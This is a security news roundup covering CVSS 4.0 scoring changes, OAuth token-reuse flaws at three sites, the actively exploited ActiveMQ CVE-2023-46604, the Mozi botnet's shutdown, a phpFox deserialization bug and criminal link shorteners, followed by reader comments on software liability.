We’ve talked a few times here about the issues with the CVSS system. We’ve seen CVE farming, where a moderate issue, or even a non-issue, gets assigned a ridiculously high CVSS score. There are times a minor problem in a library is a major problem in certain use cases, and not an issue at all in others. And with some of those issues in mind, let’s take a look at the fourth version of the Common Vulnerability Scoring System.
One of the first tweaks to cover is the de-emphasis of the base score. Version 3.1 did have optional metrics that were intended to temper the base score, but this revision has beefed that idea up with Threat Metrics, Environmental Metrics, and Supplemental Metrics. These are an attempt to measure how likely it is that an exploit will actually be used. The various combinations have been given names. Where CVSS-B is just the base metric, CVSS-BT is the base and threat scores together. CVSS-BE is the mix of base and environmental metrics, and CVSS-BTE is the combination of all three.
Another new feature is multiple scores for a given vulnerability. A problem in a library is first considered in a worst-case scenario, and the initial base score is published with those caveats made clear. And then for each downstream program that uses that library, a new base score should be calculated to reflect the reality of that case.
The last thing to mention is the extra granularity now baked into the scoring. We have the addition of “Attack Requirements”, which reflects whether the given vulnerability depends on other factors for exploitability. And similarly, the User Interaction metric is now a tri-state, set to none, passive, or active. Though I might have chosen “reasonable” and “bonehead” instead.
So far, industry response seems to be cautiously optimistic. This won’t solve every problem, but it should help. Hopefully we’ll see fewer vulnerabilities with dubious 10.0 scores, and a bit more nuance in hos CVSS is reported.
OAuth is Hard
Last week we mentioned an OAuth problem when a particular site had an open redirect. This week we’ll talk about another potential problem — OAuth without access token validation. And for the record, this Salt Security write-up is also an excellent explainer on OAuth.
So first off, OAuth is a authorization scheme. A user clicks a button on a given site to link with the user’s Facebook account. That site will open a Facebook link in a new window, with a redirect value and client ID specified as URL parameters. If it’s a new connection, Facebook spells out what information is being shared with the requesting site. If the user agrees, Facebook redirects that window to the value specified in the first URL, and appends an OAuth token to the new URL. The remote site then makes a new request to Facebook, asking for the user information, specifying the token. Facebook recognizes the token, and returns the requested information.
This scheme was designed for authorization, not authentication. The important difference is that authentication is proving who the user is, but authorization is securely allowing a site access to something. This isn’t to say that OAuth can’t be used for authentication — OpenID is based on OAuth after all. The point is that extra care has to be taken to make this authorization scheme secure for authentication.
One of the extra steps that must be taken for proper authentication is token validation. In the case of Facebook, that’s a separate API call to verify that this token was generated for the App ID where it is being used. Without that step, there’s nothing to prevent an OAuth token from one service from being reused on another service. The attack here is that if someone uses a Log in with Facebook button on a malicious site, the access token can be re-used on other sites where the user has accounts.
That’s not just theoretical, as the Salt researchers found this very problem in the wild at Vidio.com, Bukalapak.com, and Grammarly. The Grammarly flaw was particularly clever, as that site uses OAuth codes instead of tokens. But it turns out an attacker could simply include a token instead, and it worked. These issues have been privately reported and fixed on all three sites.
ActiveMQ Actively Targeted
Apache’s ActiveMQ has a really nasty issue, CVE-2023-46604, and it’s being used in active ransomware attacks already. This CVSS 10 is probably going to rate a score of 10 even on the kinder, more nuanced CVSS 4 scale. This is a Remote Code Exploit (RCE) that’s trivial to attack, vulnerable with default settinge, requires no authentication or privileges, and targets OpenWire, which is the default transport protocol in ActiveMQ.
It’s another deserialization flaw, in Java this time. An OpenWire packet with the EXCEPTION_RESPONSE
type can override the createThrowable
method with another class, and set the string parameter to that class. That opens a wide range of possibilities, but the public Proof of Concept calls a Spring configuration class, and passes an HTTP URL pointing to an attacker-controlled XML config file.
There are still over three thousand of these services accessible over the internet. That’s down from just over seven thousand on October 30th. So that’s progress. If your unpatched machine is among them, just consider it compromised and act accordingly.
Bits and Bytes
For some much-needed good news, the Mozi botnet is dead. An update to this bit of stubborn IoT malware was pushed out methodically, starting in August, deploying to India first, then China. That update was a go dormant command, and it looks like an intentional shuttering of the botnet. It’s unclear if the botnet’s masterminds just decided they were done, or if the $5 wrench decryption method was deployed.
The phpFox web application had a PHP deserialization flaw, where user input wasn’t properly sanitized before being fed into the unserialize()
function. This flaw could lead to arbitrary PHP execution, and was fixed in release 4.8.14, after some waffling by the phpFox developers. We’re inclined to give developers a bit of grace on stories like these, so long as the flaw does get fixed in reasonable time. After all, a security report might be a legitamate RCE, and it might just be someone who found the Chrome DevTools for the first time.
You may use link shorteners to share documents and pictures, or to track how well an advertisement campaign is going. Scammers and other malicious actors have other ideas, like using link shorteners to make phishing links look more legitimate. But that’s against the Bit.ly terms of service. And so, there’s a shadowy enterprise that apparently makes money selling bulletproof link shortening services to cyber criminals. Because of course there is.
>wrench decryption method
I’m partial to “Lead Pipe Legilimency”, myself. Either way, it’s great to see another botnet invoking __AvadaKedavra(self);, for once.
How long until software developers, contractors/employees, must have professional liability insurance to cover those events where client/consumer losses are directly attributable to a software component designed/developed by said developer? Other design, manufacturing industries and the healthcare system are all about users suing, in many cases, to make a bit of money. Will the mere act of having to carry liability insurance filter out sloppy work?
That would first require laws and courts to find companies liable for buggy code. There has been some efforts in the EU to do this, but the fear is that the law would drastically slow down innovation, and kill small programming shops and open source development.
Don’t worry the software industry lobbyists will never allow their benefactors to be responsible for the content delivered by their services.
If they did, then google, fb, et al would be responsible for the malware/scammers paying these tech companies to distribute their malware. There is a lot of money being made in the business of benefiting from the proceeds of crime without any liability or legal recourse.